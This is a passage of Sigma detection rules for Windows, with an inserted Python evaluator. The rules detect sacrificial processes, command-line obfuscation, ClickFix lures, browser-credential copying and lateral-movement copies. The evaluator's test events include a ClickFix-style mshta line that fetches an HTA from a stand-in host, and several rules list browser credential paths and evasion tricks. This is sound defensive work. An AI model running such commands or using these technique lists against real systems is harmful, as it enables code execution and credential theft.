    "content": "title: Bad Opsec Defaults Sacrificial Processes With Improper Arguments\nid: a7c3d773-caef-227e-a7e7-c2f13c622329\nrelated:\n    - id: f5647edc-a7bf-4737-ab50-ef8c60dc3add\n      type: obsolete\nstatus: test\ndescription: |\n    Detects attackers using tooling with bad opsec defaults.\n    E.g. spawning a sacrificial process to inject a capability into the process without taking into account how the process is normally run.\n    One trivial example of this is using rundll32.exe without arguments as a sacrificial process (default in CS, now highlighted by c2lint), running WerFault without arguments (Kraken - credit am0nsec), and other examples.\nreferences:\n    - https://blog.malwarebytes.com/malwarebytes-news/2020/10/kraken-attack-abuses-wer-service/\n    - https://www.cobaltstrike.com/help-opsec\n    - https://twitter.com/CyberRaiju/status/1251492025678983169\n    - https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/regsvr32\n    - https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/rundll32\n    - https://learn.microsoft.com/en-us/dotnet/framework/tools/regasm-exe-assembly-registration-tool\n    - https://learn.microsoft.com/en-us/dotnet/framework/tools/regsvcs-exe-net-services-installation-tool\nauthor: Oleg Kolesnikov @securonix invrep_de, oscd.community, Florian Roth (Nextron Systems), Christian Burkard (Nextron Systems)\ndate: 2020-10-23\nmodified: 2024-08-15\ntags:\n    - attack.defense-evasion\n    - attack.t1218.011\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_werfault:\n        Image|endswith: '\\WerFault.exe'\n        CommandLine|endswith: 'WerFault.exe'\n    selection_rundll32:\n        Image|endswith: '\\rundll32.exe'\n        CommandLine|endswith: 'rundll32.exe'\n    selection_regsvcs:\n        Image|endswith: '\\regsvcs.exe'\n        CommandLine|endswith: 'regsvcs.exe'\n    selection_regasm:\n        Image|endswith: 
'\\regasm.exe'\n        CommandLine|endswith: 'regasm.exe'\n    selection_regsvr32:\n        Image|endswith: '\\regsvr32.exe'\n        CommandLine|endswith: 'regsvr32.exe'\n    filter_optional_edge_update:\n        ParentImage|contains: '\\AppData\\Local\\Microsoft\\EdgeUpdate\\Install\\{'\n        Image|endswith: '\\rundll32.exe'\n        CommandLine|endswith: 'rundll32.exe'\n    filter_optional_chromium_installer:\n        # As reported in https://github.com/SigmaHQ/sigma/issues/4570 and others\n        ParentImage|contains:\n            - '\\AppData\\Local\\BraveSoftware\\Brave-Browser\\Application\\'\n            - '\\AppData\\Local\\Google\\Chrome\\Application\\'\n        ParentImage|endswith: '\\Installer\\setup.exe'\n        ParentCommandLine|contains: '--uninstall '\n        Image|endswith: '\\rundll32.exe'\n        CommandLine|endswith: 'rundll32.exe'\n    condition: 1 of selection_* and not 1 of filter_optional_*\nfalsepositives:\n    - Unlikely\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_susp_browser_launch_from_document_reader_process.yml",
    "content": "title: Potential Suspicious Browser Launch From Document Reader Process\nid: 1193d960-2369-499f-a158-7b50a31df682\nstatus: test\ndescription: |\n    Detects when a browser process or browser tab is launched from an application that handles document files, such as Adobe Acrobat Reader or Microsoft Office, and is handed a URL so that it connects to a web application over HTTP(S). This could indicate a phishing attempt.\nreferences:\n    - https://app.any.run/tasks/69c5abaa-92ad-45ba-8c53-c11e23e05d04/ # PDF Document\n    - https://app.any.run/tasks/64043a79-165f-4052-bcba-e6e49f847ec1/ # Office Document\nauthor: Joseph Kamau\ndate: 2024-05-27\nmodified: 2025-10-07\ntags:\n    - attack.execution\n    - attack.t1204.002\nlogsource:\n    product: windows\n    category: process_creation\ndetection:\n    selection:\n        ParentImage|contains:\n            - 'Acrobat Reader'\n            - 'Microsoft Office'\n            - 'PDF Reader'\n        Image|endswith:\n            - '\\brave.exe'\n            - '\\chrome.exe'\n            - '\\firefox.exe'\n            - '\\msedge.exe'\n            - '\\opera.exe'\n            - '\\maxthon.exe'\n            - '\\seamonkey.exe'\n            - '\\vivaldi.exe'\n        CommandLine|contains: 'http'\n    filter_main_microsoft_help:\n        CommandLine|contains: 'https://go.microsoft.com/fwlink/'\n    filter_optional_foxit:\n        CommandLine|contains:\n            - 'http://ad.foxitsoftware.com/adlog.php?'\n            - 'https://globe-map.foxitservice.com/go.php?do=redirect'\n    condition: selection and not 1 of filter_main_* and not 1 of filter_optional_*\nfalsepositives:\n    - Unlikely in most cases; the command line of the browser process should be investigated further to determine the context of the URL accessed.\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_susp_child_process_as_system_.yml",
    "content": "title: Suspicious Child Process Created as System\nid: 590a5f4c-6c8c-4f10-8307-89afe9453a9d\nstatus: test\ndescription: Detection of child processes spawned with SYSTEM privileges by parents with LOCAL SERVICE or NETWORK SERVICE accounts\nreferences:\n    - https://speakerdeck.com/heirhabarov/hunting-for-privilege-escalation-in-windows-environment\n    - https://foxglovesecurity.com/2016/09/26/rotten-potato-privilege-escalation-from-service-accounts-to-system/\n    - https://github.com/antonioCoco/RogueWinRM\n    - https://twitter.com/Cyb3rWard0g/status/1453123054243024897\nauthor: Teymur Kheirkhabarov, Roberto Rodriguez (@Cyb3rWard0g), Open Threat Research (OTR)\ndate: 2019-10-26\nmodified: 2024-12-01\ntags:\n    - attack.defense-evasion\n    - attack.privilege-escalation\n    - attack.t1134.002\nlogsource:\n    category: process_creation\n    product: windows\n    definition: 'Requirements: ParentUser field needs sysmon >= 13.30'\ndetection:\n    selection:\n        ParentUser|contains:\n            - 'AUTHORI'\n            - 'AUTORI'\n        ParentUser|endswith:\n            - '\\NETWORK SERVICE'\n            - '\\LOCAL SERVICE'\n        User|contains: # covers many language settings\n            - 'AUTHORI'\n            - 'AUTORI'\n        User|endswith: # System\n            - '\\SYSTEM'\n            - '\\Système'\n            - '\\СИСТЕМА'\n        IntegrityLevel:\n            - 'System'\n            - 'S-1-16-16384'\n    filter_rundll32:\n        Image|endswith: '\\rundll32.exe'\n        CommandLine|contains: 'DavSetCookie'\n    condition: selection and not 1 of filter_*\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_susp_cli_obfuscation_escape_char.yml",
    "content": "title: Potential Commandline Obfuscation Using Escape Characters\nid: f0cdd048-82dc-4f7a-8a7a-b87a52b6d0fd\nstatus: test\ndescription: Detects potential commandline obfuscation using known escape characters\nreferences:\n    - https://twitter.com/vysecurity/status/885545634958385153\n    - https://twitter.com/Hexacorn/status/885553465417756673 # Dead link\n    - https://twitter.com/Hexacorn/status/885570278637678592 # Dead link\n    - https://www.mandiant.com/resources/blog/obfuscation-wild-targeted-attackers-lead-way-evasion-techniques\n    - https://web.archive.org/web/20190213114956/http://www.windowsinspired.com/understanding-the-command-line-string-and-arguments-received-by-a-windows-program/\nauthor: juju4\ndate: 2018-12-11\nmodified: 2023-03-03\ntags:\n    - attack.defense-evasion\n    - attack.t1140\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        CommandLine|contains:\n            # - <TAB>   # no TAB modifier in sigmac yet, so this matches <TAB> (or TAB in elasticsearch backends without DSL queries)\n            - 'h^t^t^p'\n            - 'h\"t\"t\"p'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_susp_cli_obfuscation_unicode_img.yml",
    "content": "title: Potential CommandLine Obfuscation Using Unicode Characters From Suspicious Image\nid: 584bca0f-3608-4402-80fd-4075ff6072e3\nrelated:\n    - id: e0552b19-5a83-4222-b141-b36184bb8d79\n      type: similar\n    - id: ad691d92-15f2-4181-9aa4-723c74f9ddc3 # RTLO\n      type: similar\n    - id: 2c0d2d7b-30d6-4d14-9751-7b9113042ab9\n      type: obsolete\nstatus: test\ndescription: |\n    Detects potential commandline obfuscation using unicode characters.\n    Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit.\nreferences:\n    - https://www.wietzebeukema.nl/blog/windows-command-line-obfuscation\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1027/T1027.md#atomic-test-6---dlp-evasion-via-sensitive-data-in-vba-macro-over-http\nauthor: frack113, Florian Roth (Nextron Systems), Josh Nickels\ndate: 2024-09-02\nmodified: 2025-05-30\ntags:\n    - attack.defense-evasion\n    - attack.t1027\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:\n        Image|endswith:\n            - '\\cmd.exe'\n            - '\\cscript.exe'\n            - '\\powershell.exe'\n            - '\\powershell_ise.exe'\n            - '\\pwsh.exe'\n            - '\\wscript.exe'\n        OriginalFileName:\n            - 'Cmd.EXE'\n            - 'cscript.exe'\n            - 'PowerShell.EXE'\n            - 'PowerShell_ISE.EXE'\n            - 'pwsh.dll'\n            - 'wscript.exe'\n    selection_special_chars:\n        CommandLine|contains:\n            # spacing modifier letters that get auto-replaced\n            - 'ˣ' # 0x02E3\n            - '˪' # 0x02EA\n            - 'ˢ' # 0x02E2\n            # Forward slash alternatives\n            - '∕' # 0x22FF\n            - '⁄' # 0x206F\n            # Hyphen alternatives\n            - '―' # 0x2015\n            - 
'—' # 0x2014\n            # Whitespace that don't work as path separator\n            - ' ' # 0x00A0\n            # Other\n            - '¯'\n            - '®'\n            - '¶'\n            # Unicode whitespace characters\n            - '⠀' # Braille Pattern Blank (Unicode: U+2800)\n    condition: all of selection_*\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_susp_clickfix_filefix_execution.yml",
    "content": "title: Suspicious ClickFix/FileFix Execution Pattern\nid: d487ed4a-fd24-436d-a0b2-f4e95f7b2635\nrelated:\n    - id: f5fe36cf-f1ec-4c23-903d-09a3110f6bbb\n      type: similar\nstatus: experimental\ndescription: |\n    Detects suspicious execution patterns where users are tricked into running malicious commands via clipboard manipulation, either through the Windows Run dialog (ClickFix) or File Explorer address bar (FileFix).\n    Attackers leverage social engineering campaigns—such as fake CAPTCHA challenges or urgent alerts—encouraging victims to paste clipboard contents, often executing mshta.exe, powershell.exe, or similar commands to infect systems.\nreferences:\n    - https://github.com/JohnHammond/recaptcha-phish\n    - https://www.zscaler.com/blogs/security-research/deepseek-lure-using-captchas-spread-malware\n    - https://www.threatdown.com/blog/clipboard-hijacker-tries-to-install-a-trojan/\n    - https://app.any.run/tasks/5c16b4db-4b36-4039-a0ed-9b09abff8be2\n    - https://www.esentire.com/security-advisories/netsupport-rat-clickfix-distribution\n    - https://www.scpx.com.au/2025/11/16/decades-old-finger-protocol-abused-in-clickfix-malware-attacks/ # filefix variant\nauthor: montysecurity, Swachchhanda Shrawan Poudel (Nextron Systems)\ndate: 2025-11-19\ntags:\n    - attack.execution\n    - attack.t1204.001\n    - attack.t1204.004\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_parent:\n        ParentImage|endswith: '\\explorer.exe'\n        CommandLine|contains: '#'\n    selection_cli_captcha:\n        CommandLine|contains:\n            - 'account'\n            - 'anti-bot'\n            - 'botcheck'\n            - 'captcha'\n            - 'challenge'\n            - 'confirmation'\n            - 'fraud'\n            - 'human'\n            - 'identification'\n            - 'identificator'\n            - 'identity'\n            - 'robot'\n            - 'validation'\n            - 'verification'\n   
         - 'verify'\n    condition: all of selection_*\nfalsepositives:\n    - Unlikely\nlevel: high\n"
  },
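The two rules above that combine several named selections, "Bad Opsec Defaults Sacrificial Processes With Improper Arguments" (`1 of selection_* and not 1 of filter_optional_*`) and "Suspicious ClickFix/FileFix Execution Pattern" (`all of selection_*`), are easiest to reason about by running them. The following is an added example written for this page, not code from the SigmaHQ repository or a pySigma backend: it implements only the Sigma matching semantics these two rules rely on (`endswith`, `contains`, `contains|all`, plain equality; case-insensitive; a list of values means OR), transcribes the two rules' selections, and evaluates them over constructed process_creation events. All paths, the user name and the GUID in the events are made up.

```python
"""Added example, not part of the SigmaHQ rule set: a minimal evaluator for the
subset of Sigma semantics the rules above use, run over constructed
process_creation events (paths, user name and GUID are made up)."""


def _entry_matches(value, modifier, patterns):
    """One 'Field|modifier: patterns' entry. Sigma matching is case-insensitive; a list
    of patterns is OR, except contains|all which is AND. A missing field never matches."""
    if value is None:
        return False
    v = value.lower()
    pats = [p.lower() for p in (patterns if isinstance(patterns, list) else [patterns])]
    if modifier == "endswith":
        return any(v.endswith(p) for p in pats)
    if modifier == "contains":
        return any(p in v for p in pats)
    if modifier == "contains|all":
        return all(p in v for p in pats)
    if modifier == "":  # plain field: exact equality
        return v in pats
    raise ValueError(f"unsupported modifier: {modifier}")


def selection_matches(event, selection):
    """All field entries of one selection map must hold (AND)."""
    for key, pats in selection.items():
        field, _, modifier = key.partition("|")
        if not _entry_matches(event.get(field), modifier, pats):
            return False
    return True


def one_of(detection, event, prefix):
    """Sigma '1 of prefix*'."""
    return any(selection_matches(event, s) for n, s in detection.items() if n.startswith(prefix))


def all_of(detection, event, prefix):
    """Sigma 'all of prefix*'."""
    sels = [s for n, s in detection.items() if n.startswith(prefix)]
    return bool(sels) and all(selection_matches(event, s) for s in sels)


# Selections transcribed from the two rules (YAML single-quoted strings as raw strings).
BAD_OPSEC = {
    "selection_werfault": {"Image|endswith": r"\WerFault.exe", "CommandLine|endswith": "WerFault.exe"},
    "selection_rundll32": {"Image|endswith": r"\rundll32.exe", "CommandLine|endswith": "rundll32.exe"},
    "selection_regsvcs": {"Image|endswith": r"\regsvcs.exe", "CommandLine|endswith": "regsvcs.exe"},
    "selection_regasm": {"Image|endswith": r"\regasm.exe", "CommandLine|endswith": "regasm.exe"},
    "selection_regsvr32": {"Image|endswith": r"\regsvr32.exe", "CommandLine|endswith": "regsvr32.exe"},
    "filter_optional_edge_update": {
        "ParentImage|contains": r"\AppData\Local\Microsoft\EdgeUpdate\Install\{",
        "Image|endswith": r"\rundll32.exe", "CommandLine|endswith": "rundll32.exe"},
    "filter_optional_chromium_installer": {
        "ParentImage|contains": [r"\AppData\Local\BraveSoftware\Brave-Browser\Application" "\\",
                                 r"\AppData\Local\Google\Chrome\Application" "\\"],
        "ParentImage|endswith": r"\Installer\setup.exe", "ParentCommandLine|contains": "--uninstall ",
        "Image|endswith": r"\rundll32.exe", "CommandLine|endswith": "rundll32.exe"},
}
CLICKFIX = {
    "selection_parent": {"ParentImage|endswith": r"\explorer.exe", "CommandLine|contains": "#"},
    "selection_cli_captcha": {"CommandLine|contains": [
        "account", "anti-bot", "botcheck", "captcha", "challenge", "confirmation", "fraud", "human",
        "identification", "identificator", "identity", "robot", "validation", "verification", "verify"]},
}


def bad_opsec_matches(event):
    """condition: 1 of selection_* and not 1 of filter_optional_*"""
    return one_of(BAD_OPSEC, event, "selection_") and not one_of(BAD_OPSEC, event, "filter_optional_")


def clickfix_matches(event):
    """condition: all of selection_*"""
    return all_of(CLICKFIX, event, "selection_")


# Constructed sample events.
EVENTS = {
    "bare_rundll32_from_user_temp": {
        "Image": r"C:\Windows\System32\rundll32.exe", "CommandLine": "rundll32.exe",
        "ParentImage": r"C:\Users\alice\AppData\Local\Temp\update.exe"},
    "rundll32_with_arguments": {
        "Image": r"C:\Windows\System32\rundll32.exe", "CommandLine": "rundll32.exe shell32.dll,Control_RunDLL",
        "ParentImage": r"C:\Windows\explorer.exe"},
    "bare_rundll32_from_edge_update": {  # hits selection_rundll32 but is removed by the Edge filter
        "Image": r"C:\Windows\SysWOW64\rundll32.exe", "CommandLine": "rundll32.exe",
        "ParentImage": r"C:\Users\alice\AppData\Local\Microsoft\EdgeUpdate\Install\{0A1B2C3D-0000-0000-0000-000000000000}\MicrosoftEdgeUpdate.exe"},
    "clickfix_run_dialog_paste": {  # pasted into the Run dialog: explorer.exe is the parent
        "Image": r"C:\Windows\System32\mshta.exe",
        "CommandLine": "mshta https://captcha.example.invalid/verify.hta # I am not a robot - reCAPTCHA Verification ID: 5821",
        "ParentImage": r"C:\Windows\explorer.exe"},
    "comment_char_from_cmd": {  # keyword and '#' present, but the parent is not explorer.exe
        "Image": r"C:\Windows\System32\cmd.exe", "CommandLine": 'cmd.exe /c echo "build #42 verification"',
        "ParentImage": r"C:\Windows\System32\cmd.exe"},
}


def run_rules(events=EVENTS):
    """Return {event_name: (bad_opsec_hit, clickfix_hit)} for each sample event."""
    return {name: (bad_opsec_matches(ev), clickfix_matches(ev)) for name, ev in events.items()}
```

Running `run_rules()` gives one hit per rule: the bare `rundll32.exe` spawned from a user-writable temp path trips the opsec rule, while the identical command line under the EdgeUpdate parent is suppressed by `filter_optional_edge_update`, and the `mshta` line pasted into the Run dialog trips the ClickFix rule only because `explorer.exe` is the parent; the same `#` and keyword under `cmd.exe` do not. The evaluator exists to make the AND/OR semantics explicit; for production use, convert the rules with the pySigma backends instead.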
  {
    "path": "rules/windows/process_creation/proc_creation_win_susp_clickfix_filefix_whitespace_padding.yml",
    "content": "title: Suspicious Explorer Process with Whitespace Padding - ClickFix/FileFix\nid: 3ae9974a-eb09-4044-8e70-8980a50c12c8\nrelated:\n    - id: 8f2a5c3d-9e4b-4a7c-8d1f-2e5a6b9c3d7e\n      type: similar\n    - id: 7a1b4c5e-8f3d-4b9a-7c2e-1f4a5b8c6d9e\n      type: similar\nstatus: experimental\ndescription: |\n    Detects process creation with suspicious whitespace padding followed by a '#' character, which may indicate ClickFix or FileFix techniques used to conceal malicious commands from visual inspection.\n    ClickFix and FileFix are social engineering attack techniques where adversaries distribute phishing documents or malicious links that deceive users into opening the Windows Run dialog box or File Explorer search bar.\n    The victims are then instructed to paste commands from their clipboard, which contain extensive whitespace padding using various Unicode space characters to push the actual malicious command far to the right, effectively hiding it from immediate view.\nreferences:\n    - https://expel.com/blog/cache-smuggling-when-a-picture-isnt-a-thousand-words/\n    - https://mrd0x.com/filefix-clickfix-alternative/\nauthor: Swachchhanda Shrawan Poudel (Nextron Systems)\ndate: 2025-11-04\nmodified: 2025-11-26\ntags:\n    - attack.execution\n    - attack.t1204.004\n    - attack.defense-evasion\n    - attack.t1027.010\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_explorer:\n        ParentImage|endswith: '\\explorer.exe'\n        CommandLine|contains: '#'\n    selection_space_variation:\n        CommandLine|contains:\n            - '            ' # En Quad (U+2000)\n            - '            ' # Em Quad (U+2001)\n            - '            ' # En Space (U+2002)\n            - '            ' # Em Space (U+2003)\n            - '            ' # Three-Per-Em Space (U+2004)\n            - '            ' # Four-Per-Em Space (U+2005)\n            - '            ' # Six-Per-Em Space (U+2006)\n            - 
'            ' # Figure Space (U+2007)\n            - '            ' # Punctuation Space (U+2008)\n            - '            ' # Thin Space (U+2009)\n            - '            ' # Hair Space (U+200A)\n            - '            ' # No-Break Space (U+00A0)\n            - '            ' # Normal space (0x20)\n    condition: all of selection_*\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_susp_cmd_for_loop_execution_with_recursive_directory_search.yml",
    "content": "title: Suspicious Usage of For Loop with Recursive Directory Search in CMD\nid: 2782fbd8-b662-4eb5-9962-5bfbfb671e7b\nstatus: experimental\ndescription: |\n    Detects suspicious usage of the cmd.exe 'for /f' loop combined with the 'tokens=' parameter and a recursive directory listing.\n    This pattern may indicate an attempt to discover and execute system binaries dynamically, for example powershell, a technique sometimes used by attackers to evade detection.\n    This behavior has been observed in various malicious lnk files.\nreferences:\n    - https://www.virustotal.com/gui/file/29837d0d3202758063185828c8f8d9e0b7b42b365c8941cc926d2d7c7bae2fb3\nauthor: Joseliyo Sanchez, @Joseliyo_Jstnk\ndate: 2025-11-12\ntags:\n    - attack.execution\n    - attack.t1059.003\n    - attack.defense-evasion\n    - attack.t1027.010\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_tokens:\n        CommandLine|contains|all:\n            - 'for /f'\n            - 'tokens='\n            - 'in ('\n            - 'dir'\n    selection_tokens_parent:\n        ParentCommandLine|contains|all:\n            - 'for /f'\n            - 'tokens='\n            - 'in ('\n            - 'dir'\n    condition: 1 of selection_*\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_susp_commandline_path_traversal_evasion.yml",
    "content": "title: Potential Command Line Path Traversal Evasion Attempt\nid: 1327381e-6ab0-4f38-b583-4c1b8346a56b\nstatus: test\ndescription: Detects potential evasion or obfuscation attempts using bogus path traversal via the commandline\nreferences:\n    - https://twitter.com/hexacorn/status/1448037865435320323\n    - https://twitter.com/Gal_B1t/status/1062971006078345217\nauthor: Christian Burkard (Nextron Systems)\ndate: 2021-10-26\nmodified: 2023-03-29\ntags:\n    - attack.defense-evasion\n    - attack.t1036\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_1:\n        Image|contains: '\\Windows\\'\n        CommandLine|contains:\n            - '\\..\\Windows\\'\n            - '\\..\\System32\\'\n            - '\\..\\..\\'\n    selection_2:\n        CommandLine|contains: '.exe\\..\\'\n    filter_optional_google_drive:\n        CommandLine|contains: '\\Google\\Drive\\googledrivesync.exe\\..\\'\n    filter_optional_citrix:\n        CommandLine|contains: '\\Citrix\\Virtual Smart Card\\Citrix.Authentication.VirtualSmartcard.Launcher.exe\\..\\'\n    condition: 1 of selection_* and not 1 of filter_optional_*\nfalsepositives:\n    - Google Drive\n    - Citrix\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_susp_copy_browser_data.yml",
    "content": "title: Potential Browser Data Stealing\nid: 47147b5b-9e17-4d76-b8d2-7bac24c5ce1b\nrelated:\n    - id: fc028194-969d-4122-8abe-0470d5b8f12f\n      type: derived\nstatus: test\ndescription: |\n    Adversaries may acquire credentials from web browsers by reading files specific to the target browser.\n    Web browsers commonly save credentials such as website usernames and passwords so that they do not need to be entered manually in the future.\n    Web browsers typically store the credentials in an encrypted format within a credential store.\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1555.003/T1555.003.md\n    - https://www.cisa.gov/sites/default/files/2024-04/aa24-109a-stopransomware-akira-ransomware_2.pdf\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2022-12-23\nmodified: 2025-03-19\ntags:\n    - attack.credential-access\n    - attack.t1555.003\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_cmd:\n        - CommandLine|contains:\n              - 'copy-item'\n              - 'copy '\n              - 'cpi '\n              - ' cp '\n              - 'move '\n              - 'move-item'\n              - ' mi '\n              - ' mv '\n        - Image|endswith:\n              - '\\esentutl.exe' # akira ransomware\n              - '\\xcopy.exe'\n              - '\\robocopy.exe'\n        - OriginalFileName:\n              - 'esentutl.exe'\n              - 'XCOPY.EXE'\n              - 'robocopy.exe'\n    selection_path:\n        CommandLine|contains:\n            - '\\Amigo\\User Data'\n            - '\\BraveSoftware\\Brave-Browser\\User Data'\n            - '\\CentBrowser\\User Data'\n            - '\\Chromium\\User Data'\n            - '\\CocCoc\\Browser\\User Data'\n            - '\\Comodo\\Dragon\\User Data'\n            - '\\Elements Browser\\User Data'\n            - '\\Epic Privacy Browser\\User Data'\n            - 
'\\Google\\Chrome Beta\\User Data'\n            - '\\Google\\Chrome SxS\\User Data'\n            - '\\Google\\Chrome\\User Data\\'\n            - '\\Kometa\\User Data'\n            - '\\Maxthon5\\Users'\n            - '\\Microsoft\\Edge\\User Data'\n            - '\\Mozilla\\Firefox\\Profiles'\n            - '\\Nichrome\\User Data'\n            - '\\Opera Software\\Opera GX Stable\\'\n            - '\\Opera Software\\Opera Neon\\User Data'\n            - '\\Opera Software\\Opera Stable\\'\n            - '\\Orbitum\\User Data'\n            - '\\QIP Surf\\User Data'\n            - '\\Sputnik\\User Data'\n            - '\\Torch\\User Data'\n            - '\\uCozMedia\\Uran\\User Data'\n            - '\\Vivaldi\\User Data'\n    condition: all of selection_*\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_susp_copy_lateral_movement.yml",
    "content": "title: Copy From Or To Admin Share Or Sysvol Folder\nid: 855bc8b5-2ae8-402e-a9ed-b889e6df1900\nstatus: test\ndescription: Detects a copy command or a copy utility execution to or from an Admin share or remote\nreferences:\n    - https://twitter.com/SBousseaden/status/1211636381086339073\n    - https://drive.google.com/file/d/1lKya3_mLnR3UQuCoiYruO3qgu052_iS_/view\n    - https://www.elastic.co/guide/en/security/current/remote-file-copy-to-a-hidden-share.html\n    - https://www.microsoft.com/en-us/security/blog/2022/10/18/defenders-beware-a-case-for-post-ransomware-investigations/\nauthor: Florian Roth (Nextron Systems), oscd.community, Teymur Kheirkhabarov @HeirhabarovT, Zach Stanford @svch0st, Nasreddine Bencherchali\ndate: 2019-12-30\nmodified: 2025-10-22\ntags:\n    - attack.lateral-movement\n    - attack.collection\n    - attack.exfiltration\n    - attack.t1039\n    - attack.t1048\n    - attack.t1021.002\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_target:\n        CommandLine|contains:\n            - '\\\\\\\\*\\\\*$' # example \\\\SVR_NAME\\ADMIN$\n            - '\\Sysvol\\'\n    selection_other_tools:\n        - Image|endswith:\n              - '\\robocopy.exe'\n              - '\\xcopy.exe'\n        - OriginalFileName:\n              - 'robocopy.exe'\n              - 'XCOPY.EXE'\n    selection_cmd_img:\n        - Image|endswith: '\\cmd.exe'\n        - OriginalFileName: 'Cmd.Exe'\n    selection_cmd_cli:\n        CommandLine|contains: 'copy'\n    selection_pwsh_img:\n        - Image|contains:\n              - '\\powershell_ise.exe'\n              - '\\powershell.exe'\n              - '\\pwsh.exe'\n        - OriginalFileName:\n              - 'powershell_ise.exe'\n              - 'PowerShell.EXE'\n              - 'pwsh.dll'\n    selection_pwsh_cli:\n        CommandLine|contains:\n            - 'copy-item'\n            - 'copy '\n            - 'cpi '\n            - ' cp '\n            - 'move '\n    
        - ' move-item'\n            - ' mi '\n            - ' mv '\n    condition: selection_target and (selection_other_tools or all of selection_cmd_* or all of selection_pwsh_*)\nfalsepositives:\n    - Administrative scripts\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_susp_copy_system_dir.yml",
    "content": "title: Suspicious Copy From or To System Directory\nid: fff9d2b7-e11c-4a69-93d3-40ef66189767\nrelated:\n    - id: 855bc8b5-2ae8-402e-a9ed-b889e6df1900\n      type: derived\nstatus: test\ndescription: |\n    Detects a suspicious copy operation that tries to copy a program from system (System32, SysWOW64, WinSxS) directories to another on disk.\n    Often used to move LOLBINs such as 'certutil' or 'desktopimgdownldr' to a different location with a different name in order to bypass detections based on locations.\nreferences:\n    - https://www.hybrid-analysis.com/sample/8da5b75b6380a41eee3a399c43dfe0d99eeefaa1fd21027a07b1ecaa4cd96fdd?environmentId=120\n    - https://web.archive.org/web/20180331144337/https://www.fireeye.com/blog/threat-research/2018/03/sanny-malware-delivery-method-updated-in-recently-observed-attacks.html\n    - https://thedfirreport.com/2023/08/28/html-smuggling-leads-to-domain-wide-ransomware/\nauthor: Florian Roth (Nextron Systems), Markus Neis, Tim Shelton (HAWK.IO), Nasreddine Bencherchali (Nextron Systems)\ndate: 2020-07-03\nmodified: 2025-11-27\ntags:\n    - attack.defense-evasion\n    - attack.t1036.003\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img_cmd:\n        Image|endswith: '\\cmd.exe'\n        CommandLine|contains: 'copy '\n    selection_img_pwsh:\n        Image|endswith:\n            - '\\powershell.exe'\n            - '\\pwsh.exe'\n        CommandLine|contains:\n            - 'copy-item'\n            - ' copy '\n            - 'cpi '\n            - ' cp '\n    selection_img_other:\n        - Image|endswith:\n              - '\\robocopy.exe'\n              - '\\xcopy.exe'\n        - OriginalFileName:\n              - 'robocopy.exe'\n              - 'XCOPY.EXE'\n    selection_target:\n        CommandLine|re|i: \\s['\"]?C:\\\\Windows\\\\(System32|SysWOW64|WinSxS)\n    filter_optional_avira:\n        Image|endswith: '\\cmd.exe'\n        CommandLine|contains|all:\n            
- '/c copy'\n            - '\\Temp\\'\n            - '\\avira_system_speedup.exe'\n        CommandLine|contains:\n            - 'C:\\Program Files\\Avira\\'\n            - 'C:\\Program Files (x86)\\Avira\\'\n    condition: 1 of selection_img_* and selection_target and not 1 of filter_optional_*\nfalsepositives:\n    - Depend on scripts and administrative tools used in the monitored environment (For example an admin scripts like https://www.itexperience.net/sccm-batch-files-and-32-bits-processes-on-64-bits-os/)\n    - When cmd.exe and xcopy.exe are called directly #  C:\\Windows\\System32\\cmd.exe /c copy file1 file2\n    - When the command contains the keywords but not in the correct order\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_susp_copy_system_dir_lolbin.yml",
    "content": "title: LOL-Binary Copied From System Directory\nid: f5d19838-41b5-476c-98d8-ba8af4929ee2\nrelated:\n    - id: fff9d2b7-e11c-4a69-93d3-40ef66189767\n      type: derived\nstatus: test\ndescription: |\n    Detects a suspicious copy operation that tries to copy a known LOLBIN from system (System32, SysWOW64, WinSxS) directories to another on disk in order to bypass detections based on locations.\nreferences:\n    - https://www.hybrid-analysis.com/sample/8da5b75b6380a41eee3a399c43dfe0d99eeefaa1fd21027a07b1ecaa4cd96fdd?environmentId=120\n    - https://web.archive.org/web/20180331144337/https://www.fireeye.com/blog/threat-research/2018/03/sanny-malware-delivery-method-updated-in-recently-observed-attacks.html\n    - https://thedfirreport.com/2023/08/28/html-smuggling-leads-to-domain-wide-ransomware/\n    - https://www.virustotal.com/gui/file/14e722855605ba78dc1d21153f0e1be90e7528149f2cd2d7d6eba8ef27534bdc/behavior\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2023-08-29\nmodified: 2025-11-27\ntags:\n    - attack.defense-evasion\n    - attack.t1036.003\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    